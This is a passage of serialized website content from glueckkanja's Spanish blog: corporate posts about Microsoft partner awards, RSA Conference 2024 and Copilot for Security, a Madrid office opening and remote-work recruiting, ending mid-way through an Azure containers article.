glueckkanja protege continuamente las infraestructuras de los clientes y puede combatir incidentes y aplicar estrategias de protección. Con un equipo de respuesta a incidentes y APT disponible 24/7, glueckkanja garantiza que los clientes reciban asistencia inmediata en caso de emergencia y defensa contra ciberamenazas, asegurando que su infraestructura esté siempre actualizada con los últimos estándares de seguridad.",[12,2652,2653],{},"Para garantizar una experiencia nativa de Microsoft en la nube, glueckkanja ha desarrollado productos propios. Estas herramientas permiten una infraestructura completamente protegida y centrada en la nube. Su gama de productos incluye KONNEKT para trabajar con datos de Office 365 locales, RADIUSaaS y SCEPman para autenticación de red segura sin servidor, RealmJoin para distribución de software en la nube y Unified Contacts para búsqueda simplificada de contactos en Microsoft Teams.",[12,2655,2656],{},"glueckkanja se encuentra entre los primeros socios a nivel mundial que recibieron la distinción Microsoft Verified Managed Extended Detection and Response (MXDR). Con un equipo de casi 200 expertos, glueckkanja fue nombrado Microsoft Worldwide Partner of the Year en 2017, 2019, 2020, 2022 y 2023. Desde 2019, glueckkanja se ha mantenido regularmente a la vanguardia en el cuadrante ISG Microsoft 365 Alemania. Además, con sus innovaciones, glueckkanja está entre las TOP 100 empresas en Alemania, y una notable calificación de 4,8/5 en kununu consolida su reputación como un empleador líder para las empresas medianas.",{"title":65,"searchDepth":111,"depth":111,"links":2658},[2659],{"id":2643,"depth":329,"text":2644},{"lang":2170,"titleClass":2172,"date":2661,"categories":2662,"blogtitlepic":2664,"socialimg":2665,"customExcerpt":2666,"keywords":2667,"hreflang":2668},"2023-11-15",[2663],"Corporate","head-security-copilot","/blog/heads/head-security-copilot.jpg","glueckkanja anunció hoy que Microsoft ha seleccionado a la empresa para el Microsoft Security Copilot Partner Private Preview. Con su experiencia en tecnologías de seguridad de Microsoft, glueckkanja contribuirá a dar forma a esta iniciativa de seguridad impulsada por IA. La compañía trabajará estrechamente con los equipos de productos de Microsoft para apoyar el desarrollo del producto Security Copilot de diversas maneras. Esta colaboración es un hito importante en los esfuerzos de glueckkanja por ofrecer soluciones innovadoras y seguras a sus clientes.","Microsoft Security Copilot, AI in Cybersecurity, Cybersecurity Solutions, Microsoft Security Technologies, Security Copilot Development, AI-Powered Security Product, Cyber Threat Response, Global Threat Intelligence, Tech Innovation in Security, Advanced Large Language Model, Microsoft Ignite, Microsoft Copilot Flight Engineers",[2669,2671],{"lang":2260,"href":2670},"/blog/corporate/2023/11/microsoft-security-copilot-partner",{"lang":2257,"href":2670},"/posts/2023-11-15-microsoft-security-copilot-partner",{"title":2616,"description":2622},"posts/2023-11-15-microsoft-security-copilot-partner",[2663,2175,2676],"Copilot","eDLNv_Tu_3vHPC9XYkQxP-MCYxS_3-nBxdLQhpwAXus",{"id":2679,"title":2680,"author":2681,"body":2682,"cta":2165,"description":2686,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2698,"moment":2699,"navigation":2180,"path":2715,"seo":2716,"stem":2717,"tags":2718,"webcast":2167,"__hash__":2722},"content_es/posts/2024-03-13-mssp-2024.md","Después de los Oscar, ¡viene el MSSP!",[2460],{"type":9,"value":2683,"toc":2696},[2684,2687,2690,2693],[12,2685,2686],{},"El MSSP es uno de los premios más relevantes en el crucial campo de la seguridad. Este año, por quinta vez, se reconocerá a los socios de Microsoft por su trabajo excepcional y sus contribuciones a la ciberseguridad. Lo que hace tan único al premio MSSP para nosotros es que todos los finalistas son miembros de la MISA y proveedores de servicios gestionados de seguridad, que han integrado sus soluciones de seguridad en la tecnología de seguridad de Microsoft. Aquellos que llegan a la lista corta han superado a un campo global de líderes de la industria y se cuentan entre la élite en el ámbito de la seguridad.",[2688,2689],"quotes",{":quotes":2688},[12,2691,2692],{},"Los empleados de Microsoft, así como los de las empresas miembros de MISA, pueden votar por sus favoritos en la lista corta hasta el 22 de marzo de 2024. La ceremonia de entrega de los Microsoft Security Excellence Awards en las nuevas y diversas categorías tendrá lugar el 6 de mayo de 2024, en el marco de la RSA Conference, no muy lejos de Hollywood, en San Francisco.",[12,2694,2695],{},"Y ya que estamos compartiendo buenas noticias, aquí va otra: el resultado de nuestra Encuesta de Clientes CSOC 2023. El 100 % de los encuestados afirma estar muy satisfecho con los recursos proporcionados por nuestro CSOC para satisfacer sus necesidades de seguridad, y el 87 % está además muy satisfecho con la pericia de nuestro equipo. Un resultado de encuesta que nos complace especialmente. Después de todo, votan precisamente aquellos para quienes nos esforzamos al máximo todos los días: nuestros clientes.",{"title":65,"searchDepth":111,"depth":111,"links":2697},[],{"lang":2170,"titleClass":2172,"date":2699,"categories":2700,"blogtitlepic":2701,"socialimg":2702,"customExcerpt":2703,"keywords":2704,"hreflang":2705,"quotes":2710},"2024-03-13",[2663],"head-finalist-mssp","/blog/heads/head-finalist-mssp.png","¡glueckkanja está nuevamente en la lista corta para los premios MSSP del Año 2024! Justo después de haber aplaudido en Los Ángeles a Christopher Nolan, Cillian Murphy, Emma Stone y al blockbuster Oppenheimer, ya tenemos otra razón para la verdadera alegría de los premios: ¡Nosotros, en glueckkanja, somos finalistas para el premio Security MSSP del Año 2024!","MSSP, Premios MSSP del Año 2024, MSSP de Seguridad, Ciberseguridad, Socio de Microsoft, MISA, Proveedores de Servicios Gestionados de Seguridad, Tecnología de Seguridad de Microsoft, Lista Corta, Premios de Excelencia en Seguridad, Conferencia RSA, San Francisco, Encuesta de Clientes CSOC 2023, Requisitos de Seguridad, Experticia",[2706,2708],{"lang":2260,"href":2707},"/blog/corporate/2024/03/mssp-2024",{"lang":2170,"href":2709},"/blog/corporate/2024/03/mssp-2024-es",{"items":2711},[2712],{"text":2713,"name":2208,"company":2714,"img":2206,"alt":2208},"Nuestros empleados son la clave del éxito. Los clientes valoran la pericia técnica y el contacto personal con nuestros colegas, lo que fomenta una lealtad de largo plazo hacia nuestro servicio. Microsoft ha reconocido esta combinación de conocimiento especializado y entusiasmo por la innovación por segunda vez consecutiva, un logro del que estamos muy orgullosos.","Security Lead","/posts/2024-03-13-mssp-2024",{"title":2680,"description":2686},"posts/2024-03-13-mssp-2024",[2719,2720,2175,2721],"Award","Microsoft","Misa","GZ0F5SH4zl9qvivtuT_HlcxK4-5wV-MPXA2seXEOkhE",{"id":2724,"title":2725,"author":2726,"body":2727,"cta":2165,"description":2731,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2793,"moment":2795,"navigation":2180,"path":2845,"seo":2846,"stem":2847,"tags":2848,"webcast":2167,"__hash__":2850},"content_es/posts/2024-04-30-gk-at-rsac.md","glueckkanja @ Conferencia RSA",[2460],{"type":9,"value":2728,"toc":2788},[2729,2732,2740,2744,2746,2754,2757,2761,2763,2766,2769,2776,2780,2782,2785],[12,2730,2731],{},"Durante más de tres décadas, la Conferencia RSA ha sido una fuerza clave en la comunidad de ciberseguridad. En un mundo donde las amenazas de ataques crecen cada día, esta conferencia se ha vuelto esencial para cualquier persona que se ocupe de la seguridad en línea. La conocida conferencia siempre se celebra en el soleada California y glueckkanja participa una vez más.",[12,2733,2734,2735,2739],{},"Como miembro de ",[2630,2736,2738],{"href":2737,"target":2633},"https://www.microsoft.com/de-de/security/business/intelligent-security-association","la Asociación de Seguridad Inteligente de Microsoft (MISA)",", una asociación de importantes socios de seguridad de Microsoft, compartimos el objetivo común de desarrollar soluciones de seguridad de primer nivel y proteger a los clientes de amenazas.",[41,2741,2743],{"id":2742},"ia-en-el-foco-de-la-conferencia-rsa-2024","IA en el foco de la Conferencia RSA 2024",[12,2745,31],{},[12,2747,2748,2749,2753],{},"Este año, Microsoft centra el ",[2630,2750,2752],{"href":2751,"target":2633},"https://www.microsoft.com/en-us/security/blog/2024/04/04/explore-microsofts-ai-innovations-at-rsa-conference-2024","programa de la conferencia"," exclusivamente en Copilot for Security, la innovadora solución de IA diseñada para ayudar a los expertos en seguridad e IT a identificar riesgos no detectados.",[12,2755,2756],{},"Este es un tema emocionante en la discusión actual, en el cual nuestro líder de Seguridad, Jan Geisbauer, está ansioso por participar. En su sesión en el stand de Microsoft (7 de mayo, 17:30 - 17:50) durante la Conferencia RSA, presentará esta nueva tecnología, explorará sus capacidades, pero también abordará sus limitaciones actuales. Hemos resumido los puntos clave aquí.",[41,2758,2760],{"id":2759},"microsoft-copilot-for-security-para-la-detección-de-amenazas","Microsoft Copilot for Security para la Detección de Amenazas",[12,2762,31],{},[12,2764,2765],{},"Durante mucho tiempo, la detección de riesgos dependía de lo que se conoce como 'detección basada en firmas', un método que identifica amenazas basadas en patrones reconocidos. Sin embargo, a medida que el panorama de amenazas continúa cambiando y los atacantes adaptan constantemente sus estrategias, este enfoque por sí solo ya no es suficiente para la protección. El próximo avance en tecnología de seguridad implica aprovechar los grandes volúmenes de datos para la detección de amenazas. Las soluciones de software modernas analizan automáticamente conjuntos extensos de datos para detectar patrones y riesgos potenciales. No obstante, para minimizar eficazmente los falsos positivos, la experiencia de especialistas capacitados es esencial. Dada la gran cantidad de datos que deben procesarse, esto requiere recursos significativos. Aquí es exactamente donde entra en juego Microsoft Copilot for Security con soluciones innovadoras diseñadas para respaldar a los equipos de seguridad y mejorar la protección.",[12,2767,2768],{},"Además de resúmenes de los datos más importantes sobre incidentes de seguridad con soluciones sugeridas, Copilot for Security también puede responder a indicaciones sobre ciberseguridad y sus propios sistemas. La herramienta además gestiona tareas más complejas, como la creación de sus propias consultas KQL para extraer datos de seguridad específicos. Una característica particularmente útil es el análisis de scripts, que acelera en gran medida el examen de scripts sospechosos y líneas de comandos.",[12,2770,2771],{},[2772,2773],"img",{"alt":2774,"src":2775},"Una captura de pantalla de la función de análisis de scripts de Copilot for Security de Microsoft","https://res.cloudinary.com/c4a8/image/upload/v1714461543/blog/pics/rsac-copilot-for-security-script-analysis.png",[41,2777,2779],{"id":2778},"agregue-copilot-for-security-a-su-sistema","Agregue Copilot for Security a su sistema",[12,2781,31],{},[12,2783,2784],{},"Como cualquier Modelo de Lenguaje Grande (LLM), Copilot for Security aún requiere la supervisión cuidadosa de expertos. Sin embargo, especialmente al analizar datos en bruto, Copilot for Security resulta ser una herramienta potente que permite a los clientes y a los Proveedores de Servicios de Seguridad de Microsoft (MSSP) tomar decisiones más rápidas y mejor informadas.",[12,2786,2787],{},"En glueckkanja, consideramos nuestra misión mejorar constantemente y encontrar nuevas formas innovadoras de proteger a nuestros clientes de las crecientes amenazas digitales de la vida cotidiana. Por lo tanto, recomendamos a nuestros clientes incorporar Copilot for Security en sus sistemas, y estamos ansiosos por ayudarles en la planificación, implementación y utilización de la herramienta.",{"title":65,"searchDepth":111,"depth":111,"links":2789},[2790,2791,2792],{"id":2742,"depth":111,"text":2743},{"id":2759,"depth":111,"text":2760},{"id":2778,"depth":111,"text":2779},{"lang":2170,"seoTitle":2794,"titleClass":2172,"date":2795,"categories":2796,"blogtitlepic":2797,"socialimg":2798,"customExcerpt":2799,"keywords":2800,"contactInContent":2801,"hreflang":2839,"scripts":2844},"glueckkanja en la Conferencia RSA 2024","2024-04-30",[2175],"head-rsa-conference-2024","/blog/heads/head-rsa-conference-2024.png","Del 6 al 9 de mayo de 2024 abre la Conferencia RSA sus puertas, el equipo de glueckkanja, liderado por el CEO Christian Kanja y el líder de Seguridad Jan Geisbauer, estarán presente una vez más. Este año, estaremos examinando de cerca el nuevo Microsoft Copilot for Security.","glueckkanja, Conferencia RSA 2024, Microsoft Copilot for Security, Soluciones de Ciberseguridad AI, Premios MISA, MSSP de Seguridad del Año, Detección Basada en Firmas, Asociación de Seguridad Inteligente de Microsoft, Análisis de Seguridad de Big Data, Proveedor de Servicios de Seguridad de Microsoft, Innovación en Ciberseguridad AI, Herramienta de Análisis de Scripts",{"quote":2180,"infos":2802},{"headline":2803,"subline":2804,"level":41,"textStyling":2203,"flush":2204,"person":2805,"form":2820},"Ponte en contacto con nosotros","¿Tienes alguna pregunta? Estamos encantados de ayudarte a hacer tu negocio aún más seguro con Microsoft Copilot for Security.",{"image":2206,"mail":2806,"number":2807,"cloudinary":2180,"alt":2208,"name":2208,"quotee":2208,"quoteeTitle":2714,"quote":2808,"detailsHeader":2809,"details":2810},"sales@glueckkanja.com","+49694005520","Trabajar con Copilot for Security es como llevar un exoesqueleto para los analistas. Todas sus habilidades y conocimientos son repentinamente y masivamente amplificados. En glueckkanja amamos Copilot for Security. Jan Geisbauer Líder de Seguridad.","¡Esperamos tener noticias tuyas!",[2811,2816],{"text":2812,"href":2813,"details":2814,"icon":2815},"+49 69 4005520","tel:+49 69 4005520","Call now","site/phone",{"text":2817,"href":2818,"icon":2819},"info@glueckkanja.com","mailto:info@glueckkanja.com","site/mail",{"ctaText":2821,"cta":2822,"method":2168,"action":2215,"fields":2823},"Send",{"skin":2214},[2824,2826,2828,2831,2834,2836,2838],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},"Introduce tu nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":2827},"Introduce tu empresa.",{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},"Correo electrónico*","Introduce tu correo electrónico.",{"label":2832,"type":2236,"id":2237,"required":2180,"requiredMsg":2833},"Tus datos serán almacenados por nosotros para procesar y responder a tu solicitud. Encontrarás más información sobre la protección de datos en nuestra \u003Ca href=\"/en/privacy\">Política de privacidad\u003C/a>.","Confírmalo",{"type":2240,"id":2246,"value":2835},"Solicita asesoramiento de Seguridad a Copilot",{"type":2240,"id":2249,"value":2837},"nis2-consulting",{"type":2240,"id":2252},[2840,2842],{"lang":2260,"href":2841},"/blog/security/2024/04/gk-at-rsac",{"lang":2170,"href":2843},"/blog/security/2024/04/gk-at-rsac-es",{"slick":2180,"form":2180},"/posts/2024-04-30-gk-at-rsac",{"title":2725,"description":2731},"posts/2024-04-30-gk-at-rsac",[2849,2676,2175],"MISA","LWXLyTFAys2dZKO6PJVm5ZtBwXiGDtrj8Yr7vJbD388",{"id":2852,"title":2853,"author":2854,"body":2855,"cta":2165,"description":2859,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2897,"moment":2899,"navigation":2180,"path":2952,"seo":2953,"stem":2954,"tags":2955,"webcast":2167,"__hash__":2957},"content_es/posts/2024-05-27-gk-in-spain.md","Viva España, Viva La felicidadkanja",[2499],{"type":9,"value":2856,"toc":2893},[2857,2860,2864,2866,2869,2881,2885,2887,2890],[12,2858,2859],{},"Lamentamos todo esto, queridos españoles, pero por suerte algunos de nosotros ya estamos aquí: ¡los de la eficacia, los de la fiabilidad, los de la tecnología alemana!",[41,2861,2863],{"id":2862},"glueckkanja-abre-su-primera-oficina-en-españa","glueckkanja abre su primera oficina en España",[12,2865,31],{},[12,2867,2868],{},"Desde principios de año, también tenemos una oficina glueckkanja en Madrid. En glueckkanja Ibérica encontrará a nuestro equipo en la calle de Goya 36, en el barrio de Salamaca, no lejos de la Basílica de la Concepción de Nuestra Señora y del vibrante centro de Madrid.",[12,2870,2871,2872,1884,2876,2880],{},"Desde la capital de España, proporcionamos a las empresas de toda la Península Ibérica nuestra experiencia concentrada en el área de la ciberseguridad. Como uno de los socios estratégicos más importantes de Microsoft en todo el mundo y como socio de Microsoft España, ofrecemos soluciones de seguridad como ",[2630,2873,2875],{"href":2874},"/es/security/cloud-security-operations-center","CSOC (Cloud Security Operation Center)",[2630,2877,2879],{"href":2878},"/es/azure/azure-emergency-response-environment","AzERE (Azure Emergency Response Environment)"," como paquetes individuales que pueden integrarse en los procesos existentes. Esta estrategia no sólo ofrece conveniencia para nuestros clientes y crea sinergias prácticas en la implementación, sino que es particularmente prometedora en España: después de todo, España es uno de los países más afectados por los ciberataques.",[41,2882,2884],{"id":2883},"ingeniería-alemana-con-pasión-española","Ingeniería alemana con pasión española",[12,2886,31],{},[12,2888,2889],{},"Nuestra forma de trabajar es tan eficiente (¡típicamente alemana!) como única. El servicio de CSOC lo gestiona y controla nuestro equipo de grandes expertos de Ciber seguridad para nuestros clientes - nuestros análisis y todos los servicios se llevan a cabo con una gran parte de pasión española y una amplia comprensión del mercado ibérico.",[12,2891,2892],{},"¿Por qué no nos hace una visita en la calle Goya? Estaremos encantados de informarte personalmente sobre toda nuestra gama de servicios cibernéticos. En español o en alemán - ¡como tú quieras!",{"title":65,"searchDepth":111,"depth":111,"links":2894},[2895,2896],{"id":2862,"depth":111,"text":2863},{"id":2883,"depth":111,"text":2884},{"lang":2170,"seoTitle":2898,"titleClass":2172,"date":2899,"categories":2900,"blogTitleImages":2901,"blogtitlepic":2912,"socialimg":2913,"customExcerpt":2914,"keywords":2915,"contactInContent":2916,"hreflang":2946,"scripts":2951},"glueckkanja abre la primera oficina en España","2024-05-27",[2663],[2902,2904,2906,2908,2910],{"img":2903,"cloudinary":2180},"/blog/heads/head-spain-reserved-es.png",{"img":2905,"cloudinary":2180},"/blog/heads/head-spain-temperature-es.png",{"img":2907,"cloudinary":2180},"/blog/heads/head-spain-hacker-es.png",{"img":2909,"cloudinary":2180},"/blog/heads/head-spain-cyberattack-es.png",{"img":2911,"cloudinary":2180},"/blog/heads/head-spain-pronunciation-es.png","head-spain-reserved-es","/heads/head-spain-reserved-es.png","¿Quién no los conoce? ¿Los alemanes que salen discretamente de su habitación a primera hora de la mañana para reservar rápidamente las mejores tumbonas junto a la piscina (¡incluso antes que los ingleses!). ¿O los que llevan calcetines de tenis blancos con sandalias? ¿Los que se beben la sangría en un cubo con pajitas? ¿Los que dicen Pa-ella en vez de Paeja (y Ma-llorca en vez de Mallorca)?","glueckkanja, Madrid, Empresa alemana en España, Ciberseguridad, Microsoft, Ingenieria alemana, glueckkanja Iberica",{"quote":2180,"infos":2917},{"headline":2918,"subline":2919,"level":41,"textStyling":2203,"flush":2204,"person":2920,"form":2931},"Contacta ahora","¿Quieres saber qué podemos hacer por ti en España? Estaremos encantados de asesorarte sobre nuestros servicios y tecnologías., ¡y esperamos Esperamos tus noticias!",{"image":2921,"cloudinary":2180,"alt":2499,"name":2499,"quotee":2499,"quoteeTitle":2922,"quote":2923,"detailsHeader":2924,"details":2925},"/people/people-juan-jose-fernandez.jpg","Regional Sales Manager","Nuestra nueva oficina de Madrid combina la precisión alemana con la pasión española por nuestras soluciones de seguridad esbeltas e innovadoras, que generan confianza con nuestros clientes y se basan en la última tecnología combinada con las necesidades de nuestros clientes. las raíces locales.","Esperamos tener noticias tuyas.",[2926,2930],{"text":2927,"href":2928,"details":2929,"icon":2815},"+34 680 225643","tel:+34 680 225643","Llama ahora",{"text":2817,"href":2818,"icon":2819},{"ctaText":2212,"cta":2932,"method":2168,"action":2215,"fields":2933},{"skin":2214},[2934,2935,2937,2938,2941,2943,2945],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},"La empresa*",{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},"Tus datos serán almacenados por nosotros para procesar y responder a tu consulta. Encontrarás más información sobre la protección de datos en nuestra \u003Ca href=\"/es/privacy\">política de privacidad\u003C/a>.","Confirma, por favor",{"type":2240,"id":2246,"value":2942},"Servicios de consulta en España",{"type":2240,"id":2249,"value":2944},"gk-in-spain",{"type":2240,"id":2252},[2947,2949],{"lang":2260,"href":2948},"/blog/corporate/2024/05/gk-in-spain",{"lang":2257,"href":2950},"/blog/corporate/2024/05/gk-in-spain-en",{"slick":2180,"form":2180},"/posts/2024-05-27-gk-in-spain",{"title":2853,"description":2859},"posts/2024-05-27-gk-in-spain",[2175,2956,2720],"Spain","fjOMTkVe5YWQChjZ9FmaULwK7oLhJ_iwYhqavYCaChk",{"id":2959,"title":2960,"author":2961,"body":2962,"cta":2165,"description":2966,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2980,"moment":2982,"navigation":2180,"path":3021,"seo":3022,"stem":3023,"tags":3024,"webcast":2167,"__hash__":3026},"content_es/posts/2024-06-26-partner-of-the-year-2024.md","Partner of the Yeah, Yeah, Yeah, Year!",[2460],{"type":9,"value":2963,"toc":2978},[2964,2967,2970],[12,2965,2966],{},"A partir de hoy, es oficial: ¡Somos una vez más Partner of the Year de Microsoft! Entre un grupo mundial de los mejores socios de Microsoft, hemos sido galardonados en 2024 por nuestro extraordinario rendimiento y nuestras innovadoras soluciones para clientes basadas en tecnologías de Microsoft. Con más de 4.700 nominaciones y participantes de más de 100 países, ¡hemos llegado a lo más alto! Extendemos nuestro más sincero agradecimiento a todo el equipo de Microsoft. Siempre es maravilloso saber cuánto aprecia nuestro trabajo para nuestros clientes. Todos en glueckkanja estamos encantados de teneros como socios.",[12,2968,2969],{},"Este año hemos recibido el premio \"Partner of the Year\" por transformar los espacios de trabajo digitales de un banco del norte de Alemania. El reto consistía en establecer nuevos estándares de innovación y agilidad en las soluciones de gestión de terminales. Con nuestras soluciones de puesto de trabajo basadas en la nube y desarrolladas por nosotros mismos, basadas en Microsoft E5 y Windows 365, pudimos mejorar la seguridad, la eficacia y la satisfacción, reduciendo al mismo tiempo los costes y aumentando la productividad. Esto no sólo redefinió el espacio de trabajo digital del cliente, sino que nos consolidó como líderes del mercado en soluciones modernas de gestión de terminales. Si quieres saber más sobre nuestro caso de \"Partner of the Year\" y nuestro premio, estaremos encantados de presentarte personalmente el proceso de transformación.",[12,2971,2972,2973,2977],{},"Ahora, nos vamos a celebrarlo, y te recomendamos que consultes la lista completa de ganadores y finalistas, que puedes encontrar ",[2630,2974,2976],{"href":2975},"https://aka.ms/2024POTYAWinnersFinalists","aquí",". Una vez más, enhorabuena a todos los ganadores y finalistas de parte de todos nosotros.",{"title":65,"searchDepth":111,"depth":111,"links":2979},[],{"lang":2170,"seoTitle":2981,"titleClass":2172,"date":2982,"categories":2983,"blogtitlepic":2984,"socialimg":2985,"customExcerpt":2986,"keywords":2987,"contactInContent":2988,"hreflang":3015,"scripts":3020},"glueckkanja es Microsoft Partner of the Year 2024","2024-06-26",[2663],"head-partner-of-the-year-2024","/heads/head-partner-of-the-year-2024.jpg","Una vez es sólo el principio, y cinco veces te sitúa en el establecimiento. Pero, ¿qué dices a ser nombrado 'Partner of the Year' de Microsoft por octava vez? Nosotros decimos: Partner of the Yeah, Yeah, Yeah, Year!","POY, Award, Microsoft Partner of the Year 2024, Transformation process, Endpoint Management, Microsoft E5, Windows 365, Country Partner of the Year",{"quote":2180,"infos":2989},{"bgColor":2990,"color":2991,"boxBgColor":2992,"boxColor":2993,"headline":2918,"subline":2994,"level":41,"textStyling":2203,"flush":2204,"person":2995,"form":3003},"var(--color-secondary)","var(--color-copy)","var(--color-blue-medium)","var(--color-white)","¿Quieres profundizar en nuestro caso y premio? Nos encantaría guiarte personalmente a través de nuestro proceso de transformación. ¡Ponte en contacto con nosotros!",{"image":2996,"cloudinary":2180,"alt":2419,"name":2419,"quotee":2419,"quoteeTitle":2997,"quote":2998,"detailsHeader":2924,"details":2999},"/people/people-christian-kanja.jpg","CEO","Este premio no es sólo un honor, sino una motivación. Muchísimas gracias a nuestro fantástico equipo de glueckkanja, a nuestra increíble colaboración con los clientes y, por supuesto, a nuestros compañeros de Microsoft. Juntos, hemos logrado grandes cosas y tenemos metas aún mayores por delante.",[3000,3002],{"text":2812,"href":2813,"details":3001,"icon":2815},"Jetzt anrufen",{"text":2817,"href":2818,"icon":2819},{"ctaText":2821,"cta":3004,"method":2168,"action":2215,"fields":3005},{"skin":2214},[3006,3007,3008,3009,3011,3013,3014],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":3010,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},"Tus datos serán almacenados por nosotros para procesar y responder a tu consulta. Encontrarás más información sobre la protección de datos en nuestra \u003Ca href=\"/en/privacy\">política de privacidad\u003C/a>.",{"type":2240,"id":2246,"value":3012},"Consulta POY Case",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3016,3018],{"lang":2260,"href":3017},"/blog/corporate/2024/06/partner-of-the-year-2024",{"lang":2257,"href":3019},"/blog/corporate/2024/06/partner-of-the-year-2024-en",{"slick":2180,"form":2180},"/posts/2024-06-26-partner-of-the-year-2024",{"title":2960,"description":2966},"posts/2024-06-26-partner-of-the-year-2024",[2719,3025],"Partner of the Year","c_AaDStqmQda1pPRBz-tuZk9aFx2eSoapPi3bJKrW6A",{"id":3028,"title":3029,"author":3030,"body":3031,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3077,"moment":3079,"navigation":2180,"path":3091,"seo":3092,"stem":3093,"tags":3094,"webcast":2167,"__hash__":3099},"content_es/posts/2024-07-08-homeoffice.md","Porque importa más el qué que el dónde",[2504],{"type":9,"value":3032,"toc":3074},[3033,3037,3040,3043,3046,3049],[186,3034,3036],{"id":3035},"en-glueckkanja-puedes-seguir-trabajando-multimóvil","En glueckkanja, puedes seguir trabajando multimóvil.",[12,3038,3039],{},"A diferencia de muchas otras empresas de TI, puedes seguir trabajando con nosotros con la movilidad que conoces y que tanto te ha gustado en los últimos años. Aparte de los mejores resultados laborales, creemos que hay muchas otras razones a favor del trabajo desde casa y el trabajo multimóvil. Menos estrés, mejor compatibilidad de trabajo y familia, un equilibrio óptimo entre vida laboral y familiar, más flexibilidad y mucho más tiempo personal -gracias a la eliminación de los desplazamientos- son sólo algunas de ellas.",[12,3041,3042],{},"Por cierto, la Universidad Técnica de Darmstadt también consiguió interesantes datos sobre este tema en una encuesta realizada entre diciembre de 2022 y marzo de 2023. Según sus propias estimaciones, más del 75% de los empleados en puestos de oficina son eficaces cuando trabajan desde casa. El 60% afirma que trabaja con más éxito desde casa y que también está más satisfecho. Más del 40% incluso renunciaría si tuviera que volver a trabajar exclusivamente en la oficina.",[12,3044,3045],{},"Esta encuesta reafirma nuestra opinión. Por tanto, mantenemos nuestra política de libre elección del lugar de trabajo. Con ello, nos oponemos firmemente a la tendencia actual del sector de volver a políticas de oficina rígidas con una flexibilidad limitada. Si tú también te resistes a esta tendencia, tenemos algo interesante para ti: ¡nuestras vacantes!",[12,3047,3048],{},"Aquí encontrarás empleos flexibles con un gran equilibrio entre vida laboral y personal:",[52,3050,3056],{"className":3051},[3052,3053,3054,3055],"cta-list","d-inline-block","mt-2","mb-2",[2630,3057,3069],{"role":3058,"className":3059,"dataText":3066,"href":3067,"type":3068},"button",[3060,3061,3062,3063,3064,3065],"cta","btn","w-100","w-lg-auto","btn-primary","vue-component","A las ofertas de empleo","/es/job-offers","Button",[102,3070,3073],{"className":3071},[3072],"cta__text","To the job offers",{"title":65,"searchDepth":111,"depth":111,"links":3075},[3076],{"id":3035,"depth":329,"text":3036},{"lang":2170,"seoTitle":3078,"titleClass":2172,"date":3079,"categories":3080,"blogtitlepic":3081,"socialimg":3082,"customExcerpt":3083,"keywords":3084,"hreflang":3085,"scripts":3090},"Trabajo multimóvil en glueckkanja: menos estrés y un mejor equilibrio entre trabajo y vida privada","2024-07-08",[2663],"head-homeoffice-zuse-en","/blog/heads/head-homeoffice-zuse-en.png","¿Has oído hablar del escritorio de Konrad Zuse? ¿Sabes cómo es? ¿Si era grande o pequeño? ¿Ordenado o caótico? ¿Minimalista o lleno de notas personales? ¿No? ¿Nunca? No te preocupes: nosotros tampoco. Y hay una buena razón para ello: simplemente no importa dónde o en qué entorno tengas tus ideas brillantes, lo único que cuenta es la calidad de esas ideas.","Remote Jobs, Flexible Working, Work-Life Balance, Balancing Career and Family, Working Remotely, Multimobile Working, Stress-Free Work, Choice of Workplace, Satisfaction in Home Office, Jobs in IT Companies",[3086,3088],{"lang":2260,"href":3087},"/blog/corporate/2024/07/homeoffice",{"lang":2257,"href":3089},"/blog/corporate/2024/07/homeoffice-en",{"slick":2180,"form":2180},"/posts/2024-07-08-homeoffice",{"title":3029,"description":65},"posts/2024-07-08-homeoffice",[3095,3096,3097,3098],"Employer Branding","Top Employer","Recruiting","Homeoffice","asu2YUwhf7WOnxyp1lPiuPvBk_JnyYUv_uaKiseRzF0",{"id":3101,"title":3102,"author":3103,"body":3104,"cta":2165,"description":3108,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3239,"moment":3241,"navigation":2180,"path":3276,"seo":3277,"stem":3278,"tags":3279,"webcast":2167,"__hash__":3283},"content_es/posts/2024-07-12-containers-on-azure.md","Azure Container Services: modernos, eficaces e indispensable",[2509],{"type":9,"value":3105,"toc":3233},[3106,3109,3112,3115,3119,3121,3124,3127,3158,3161,3164,3168,3170,3173,3179,3182,3185,3188,3191,3195,3197,3200,3206,3215,3221,3224,3228,3230],[12,3107,3108],{},"En nuestro mundo acelerado, las empresas se enfrentan constantemente a nuevos desafíos que requieren soluciones rápidas y flexibles. Los contenedores son una tecnología clave que cumple estos requisitos. Estos permiten hacer que los procesos de desarrollo y despliegue de software sean más eficientes y se adapten al vertiginoso ritmo de la transformación digital.",[12,3110,3111],{},"Los contenedores, componentes básicos de los modernos flujos de trabajo CI/CD, ofrecen un entorno de ejecución minimalista y eficiente que incluye únicamente los componentes esenciales necesarios para ejecutar una aplicación. Al separar los componentes adicionales proporcionados por el sistema host, los contenedores reducen significativamente los tiempos de arranque y actualización.",[12,3113,3114],{},"La pregunta que se plantea ahora es: ¿cómo aprovechar y gestionar mejor este potencial?",[41,3116,3118],{"id":3117},"soluciones-de-contenedores-en-azure","Soluciones de contenedores en Azure",[12,3120,31],{},[12,3122,3123],{},"Microsoft Azure ofrece una amplia gama de opciones para utilizar contenedores. Las opciones van desde soluciones totalmente gestionadas, en las que Microsoft se hace cargo de gran parte de la configuración de la infraestructura, hasta soluciones de gestión ligera, en las que la gestión y el mantenimiento del sistema host son responsabilidad del cliente.",[12,3125,3126],{},"Aquí 